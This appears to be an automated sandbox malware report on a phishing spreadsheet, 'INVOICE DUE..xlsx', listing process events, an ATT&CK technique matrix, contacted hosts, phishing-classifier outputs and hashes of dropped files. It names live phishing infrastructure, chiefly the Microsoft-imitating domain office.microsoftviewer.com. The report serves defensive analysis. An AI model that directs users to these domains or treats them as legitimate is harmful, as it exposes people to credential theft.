    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
    Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
    Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
    Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
    Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
    Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
    Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
    Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformation
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information1
    Scripting
    Valid AccountsWindows Management Instrumentation1
    Browser Extensions
    1
    Process Injection
    1
    Masquerading
    OS Credential Dumping1
    Process Discovery
    Remote ServicesData from Local System2
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    Scripting
    1
    Registry Run Keys / Startup Folder
    1
    Virtualization/Sandbox Evasion
    LSASS Memory1
    Virtualization/Sandbox Evasion
    Remote Desktop ProtocolData from Removable Media1
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAt1
    Registry Run Keys / Startup Folder
    1
    Extra Window Memory Injection
    1
    Process Injection
    Security Account Manager1
    File and Directory Discovery
    SMB/Windows Admin SharesData from Network Shared Drive2
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Deobfuscate/Decode Files or Information
    NTDS2
    System Information Discovery
    Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Extra Window Memory Injection
    LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    INVOICE DUE..xlsx3%ReversingLabs
    INVOICE DUE..xlsx5%VirustotalBrowse
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    bg.microsoft.map.fastly.net0%VirustotalBrowse
    office.microsoftviewer.com2%VirustotalBrowse
    challenges.cloudflare.com0%VirustotalBrowse
    a.nel.cloudflare.com0%VirustotalBrowse
    www.google.com0%VirustotalBrowse
    cdnjs.cloudflare.com0%VirustotalBrowse
    code.jquery.com1%VirustotalBrowse
    s-part-0014.t-0009.t-msedge.net0%VirustotalBrowse
    s-part-0032.t-0009.t-msedge.net0%VirustotalBrowse
    s-part-0017.t-0009.t-msedge.net0%VirustotalBrowse
    No Antivirus matches
    NameIPActiveMaliciousAntivirus DetectionReputation
    s-part-0014.t-0009.t-msedge.net
    13.107.246.42
    truefalseunknown
    bg.microsoft.map.fastly.net
    199.232.214.172
    truefalseunknown
    a.nel.cloudflare.com
    35.190.80.1
    truefalseunknown
    code.jquery.com
    151.101.66.137
    truefalseunknown
    office.microsoftviewer.com
    172.67.139.200
    truetrueunknown
    cdnjs.cloudflare.com
    104.17.25.14
    truefalseunknown
    challenges.cloudflare.com
    104.18.95.41
    truefalseunknown
    s-part-0017.t-0009.t-msedge.net
    13.107.246.45
    truefalseunknown
    www.google.com
    142.250.185.132
    truefalseunknown
    pulseperpetuawe.ru
    188.114.96.3
    truefalse
      unknown
      s-part-0032.t-0009.t-msedge.net
      13.107.246.60
      truefalseunknown
      NameMaliciousAntivirus DetectionReputation
      https://office.microsoftviewer.com/?__cf_chl_tk=Yue3mkwHj7jK_QW1sgu_IsIN8EhPVsPZnnqD8d7weNk-1727695526-0.0.1.1-5332true
        unknown
        https://office.microsoftviewer.com/true
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          52.113.194.132
          unknownUnited States
          8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
          142.250.110.84
          unknownUnited States
          15169GOOGLEUSfalse
          13.107.246.42
          s-part-0014.t-0009.t-msedge.netUnited States
          8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
          142.250.185.206
          unknownUnited States
          15169GOOGLEUSfalse
          52.182.143.209
          unknownUnited States
          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
          142.250.74.206
          unknownUnited States
          15169GOOGLEUSfalse
          142.250.186.163
          unknownUnited States
          15169GOOGLEUSfalse
          104.18.94.41
          unknownUnited States
          13335CLOUDFLARENETUSfalse
          142.250.185.132
          www.google.comUnited States
          15169GOOGLEUSfalse
          104.18.95.41
          challenges.cloudflare.comUnited States
          13335CLOUDFLARENETUSfalse
          172.67.139.200
          office.microsoftviewer.comUnited States
          13335CLOUDFLARENETUStrue
          216.58.206.35
          unknownUnited States
          15169GOOGLEUSfalse
          239.255.255.250
          unknownReserved
          unknownunknownfalse
          188.114.97.3
          unknownEuropean Union
          13335CLOUDFLARENETUSfalse
          52.109.32.97
          unknownUnited States
          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
          188.114.96.3
          pulseperpetuawe.ruEuropean Union
          13335CLOUDFLARENETUSfalse
          52.109.89.19
          unknownUnited States
          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
          199.232.214.172
          bg.microsoft.map.fastly.netUnited States
          54113FASTLYUSfalse
          151.101.66.137
          code.jquery.comUnited States
          54113FASTLYUSfalse
          23.43.61.160
          unknownUnited States
          20940AKAMAI-ASN1EUfalse
          35.190.80.1
          a.nel.cloudflare.comUnited States
          15169GOOGLEUSfalse
          104.17.25.14
          cdnjs.cloudflare.comUnited States
          13335CLOUDFLARENETUSfalse
          IP
          192.168.2.16
          Joe Sandbox version:41.0.0 Charoite
          Analysis ID:1522626
          Start date and time:2024-09-30 13:24:35 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:defaultwindowsinteractivecookbook.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:17
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • EGA enabled
          Analysis Mode:stream
          Analysis stop reason:Timeout
          Sample name:INVOICE DUE..xlsx
          Detection:MAL
          Classification:mal64.phis.winXLSX@21/16@32/184
          Cookbook Comments:
          • Found application associated with file extension: .xlsx
          • Exclude process from analysis (whitelisted): dllhost.exe
          • Excluded IPs from analysis (whitelisted): 52.109.32.97, 52.109.89.19, 52.113.194.132, 23.43.61.160, 199.232.214.172
          • Excluded domains from analysis (whitelisted): ecs.office.com, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, prod.configsvc1.live.com.akadns.net, weu-azsc-000.roaming.officeapps.live.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, eur.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com, s-0005.s-msedge.net, config.officeapps.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, ecs.office.trafficmanager.net, ukw-azsc-config.officeapps.live.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, europe.configsvc1.live.com.akadns.net
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtCreateKey calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtReadVirtualMemory calls found.
          InputOutput
          URL: Office document Model: jbxai
          {
          "brand":["Adobe"],
          "contains_trigger_text":true,
          "trigger_text":"STATEMENT DUE",
          "prominent_button_name":"View",
          "text_input_field_labels":"unknown",
          "pdf_icon_visible":true,
          "has_visible_captcha":false,
          "has_urgent_text":false,
          "has_visible_qrcode":false}
          URL: https://office.microsoftviewer.com/ Model: jbxai
          {
          "brand":["office.microsoftviewer.com"],
          "contains_trigger_text":true,
          "trigger_text":"Verifying you are human. This may take a few seconds.",
          "prominent_button_name":"unknown",
          "text_input_field_labels":"unknown",
          "pdf_icon_visible":false,
          "has_visible_captcha":true,
          "has_urgent_text":false,
          "has_visible_qrcode":false}
          URL: https://office.microsoftviewer.com/ Model: jbxai
          {
          "brand":["Cloudflare"],
          "contains_trigger_text":true,
          "trigger_text":"Verifying you are human. This may take a few seconds.",
          "prominent_button_name":"Verifying...",
          "text_input_field_labels":"unknown",
          "pdf_icon_visible":false,
          "has_visible_captcha":true,
          "has_urgent_text":false,
          "has_visible_qrcode":false}
          URL: https://office.microsoftviewer.com/ Model: jbxai
          {
          "phishing_score":8,
          "brands":"office.microsoftviewer.com",
          "legit_domain":"microsoft.com",
          "classification":"wellknown",
          "reasons":["The brand 'Microsoft' is well-known and associated with the domain 'microsoft.com'.",
          "The URL 'office.microsoftviewer.com' contains 'microsoft' but is not a full match to 'microsoft.com'.",
          "The use of 'viewer' in the subdomain is suspicious and not a common practice for Microsoft.",
          "The input fields labeled 'u,
           n,
           k,
           n,
           o,
           w,
           n' are unusual and do not follow standard naming conventions for input fields."],
          "brand_matches":[false],
          "url_match":false,
          "brand_input":"office.microsoftviewer.com",
          "input_fields":"u,
           n,
           k,
           n,
           o,
           w,
           n"}
          URL: https://office.microsoftviewer.com/ Model: jbxai
          {
          "brand":[],
          "contains_trigger_text":false,
          "trigger_text":"",
          "prominent_button_name":"Next",
          "text_input_field_labels":"unknown",
          "pdf_icon_visible":false,
          "has_visible_captcha":false,
          "has_urgent_text":false,
          "has_visible_qrcode":false}
          URL: https://office.microsoftviewer.com/ Model: jbxai
          {
          "brand":[],
          "contains_trigger_text":false,
          "trigger_text":"",
          "prominent_button_name":"Next",
          "text_input_field_labels":"unknown",
          "pdf_icon_visible":false,
          "has_visible_captcha":false,
          "has_urgent_text":false,
          "has_visible_qrcode":false}
          URL: https://office.microsoftviewer.com/?__cf_chl_tk=Yue3mkwHj7jK_QW1sgu_IsIN8EhPVsPZnnqD8d7weNk-1727695526-0.0.1.1-5332 Model: jbxai
          {
          "brand":[],
          "contains_trigger_text":false,
          "trigger_text":"",
          "prominent_button_name":"unknown",
          "text_input_field_labels":"unknown",
          "pdf_icon_visible":false,
          "has_visible_captcha":false,
          "has_urgent_text":false,
          "has_visible_qrcode":false}
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):338
          Entropy (8bit):3.4738726491832703
          Encrypted:false
          SSDEEP:
          MD5:7B531D61E9C815B30AFC5B8AF143A653
          SHA1:667F68A11D9F20EBACCDFF8C792F446D518C2076
          SHA-256:BA0C7CE940EC8994B1283E0C9C1AA29ACDBDA06DF7E3D4B1483AFF1F803DC9DB
          SHA-512:2C4BE90E1E99DBBFA07901EF4E8EBFC73AE0E0C1E9F6852BEA5BC5FC2FF6EF7ACF8BEE6879BD754C558C9E252BDACB88EA9EB6794456A279703563C7FF86D2FD
          Malicious:false
          Reputation:unknown
          Preview:p...... .........g.h+...(..................................................^SZ.. .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...
          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
          File Type:Composite Document File V2 Document, Cannot read section info
          Category:dropped
          Size (bytes):2560
          Entropy (8bit):1.8746923505959838
          Encrypted:false
          SSDEEP:
          MD5:6D4605B731C205074057C324A81D4DD7
          SHA1:9B20FC9C68EC7F61BB667A335BD6580C80657FDC
          SHA-256:5614EC42648E182CDA046343018826D10F183C2DAD4E67343E8D9E4D81B18A54
          SHA-512:3756F068FD15C70874F52B6A554E8991B28CABDED3088052F03F83235D38053D3FA11BABDDA905A1CE3DF95FD96A37C3BF6E877B95DC00EEDED8CC7F9FF2CB40
          Malicious:false
          Reputation:unknown
          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Sep 30 10:25:26 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
          Category:dropped
          Size (bytes):2673
          Entropy (8bit):3.9865637100799978
          Encrypted:false
          SSDEEP:
          MD5:EBD5799B820D1FEBB803E358B5D8F922
          SHA1:503324E02B78C67DB525F063641FC1BE6C9F1E0C
          SHA-256:F0962F2D1E9EF91A724F484CA9B94EDC9DB32EC8C888D41391285DD5E380E9F1
          SHA-512:DD81A769F914F96E84D2510B0A50762A717FB3B305709D6AF33F32AFCD47DADFF6B64213E67CBD6D5DBF2E362035D9C8230C3C83ABC432203CA304721DB249B3
          Malicious:false
          Reputation:unknown
          Preview:L..................F.@.. ...$+.,....j.r+...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I>Y.[....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V>Y,[....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V>Y,[....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V>Y,[..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V>Y.[...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............/......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Sep 30 10:25:26 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
          Category:dropped
          Size (bytes):2675
          Entropy (8bit):4.0044620443771395
          Encrypted:false
          SSDEEP:
          MD5:75C974524E0347B2C5750476614AA62F
          SHA1:CF7D3DDDC76984BE9157367B23FE998863595B25
          SHA-256:33880445A325CA34E3341C4D9FC466DA3559CFFF28C6F35B1C0427C68DB42B1B
          SHA-512:4E2CF479437E0530E853BB2E276B2229FD63381420ACE50C0D2D9C7EA15504D32FDAA35703BDF6B3AAA657CEAEDC268B11EAFB88F7BD6DBF2CDFBBC125497836
          Malicious:false
          Reputation:unknown
          Preview:L..................F.@.. ...$+.,......r+...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I>Y.[....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V>Y,[....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V>Y,[....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V>Y,[..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V>Y.[...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............/......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
          Category:dropped
          Size (bytes):2689
          Entropy (8bit):4.014699604854875
          Encrypted:false
          SSDEEP:
          MD5:24D6D93694972804BCF1940E7388210C
          SHA1:FE62DEFBC2CB1D20F450F41A2DCC5ECB612AB273
          SHA-256:71662081C4AD571D4AF2372DAA19841368167B0994857298CFDFFC9BB56A63AE
          SHA-512:3C4320495DB09BFFFC496836AFDD3E4A5D1CA2E4AE36FE4E44EDA0A4758FFBBEF320825845106948DDB1DBBC462F2B0EF952A8A21B8624F0275BE756698A1395
          Malicious:false
          Reputation:unknown
          Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I>Y.[....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V>Y,[....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V>Y,[....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V>Y,[..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............/......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Sep 30 10:25:26 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
          Category:dropped
          Size (bytes):2677
          Entropy (8bit):4.001312318090382
          Encrypted:false
          SSDEEP:
          MD5:672B711F4AC149F743F8DC74EBFF24A1
          SHA1:52C78EE8C102C1E353F75E07DB545B4FE15897E9
          SHA-256:4A746F0FC100002CB2AADA97516BD500C59DFE768FA43DB0CC072A16C8120AD0
          SHA-512:9095559132E8C696714DF6EC0493A9BD3D4A0509D1CCEF87977DD63AC7A8A666121619F24FC913EC5BD25A00F56075AD562F1E4EBF2F0481A67B5C551633535E
          Malicious:false
          Reputation:unknown
          Preview:L..................F.@.. ...$+.,.....c.r+...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I>Y.[....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V>Y,[....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V>Y,[....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V>Y,[..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V>Y.[...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............/......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Sep 30 10:25:26 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
          Category:dropped
          Size (bytes):2677
          Entropy (8bit):3.990112167820944
          Encrypted:false
          SSDEEP:
          MD5:493BC6B4C8A82A336711F3CE1F29740E
          SHA1:8F2C4827B536C70B9C54EBB135D8F9E59EEA8D2B
          SHA-256:0FFF4826CC18D2491C843B4377EDBFFB8E59F613EDA939AFAFBAF8B5E5F8D82C
          SHA-512:0A38298644DFF8678E20F558BFAA32D9942284B788A0BD437E690CEDBB8C71C22F8D476628F783B5469AC23C8FDD9071642DAF4A263532F332FCDD50E12CF78B
          Malicious:false
          Reputation:unknown
          Preview:L..................F.@.. ...$+.,....*..r+...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I>Y.[....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V>Y,[....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V>Y,[....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V>Y,[..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V>Y.[...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............/......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Sep 30 10:25:26 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
          Category:dropped
          Size (bytes):2679
          Entropy (8bit):3.9989657324282613
          Encrypted:false
          SSDEEP:
          MD5:C6AF58ED235B45F8FBDA0372FF443FF9
          SHA1:380DF6E1C69B870595AE6469CD51825089382819
          SHA-256:E07264FAD7CDAD67A10F5D0C9ACA840B80E3143CA075EF78076B1F41AEDC26A3
          SHA-512:A715AF43C8077A1DDBD0E11F70BE20776DD96BE120896E45B52703B6BF74599BAF2A88CF1EC47F5D240944E4B7F78D688604933024C4C340C8C6D8C5DCCF1C6B
          Malicious:false
          Reputation:unknown
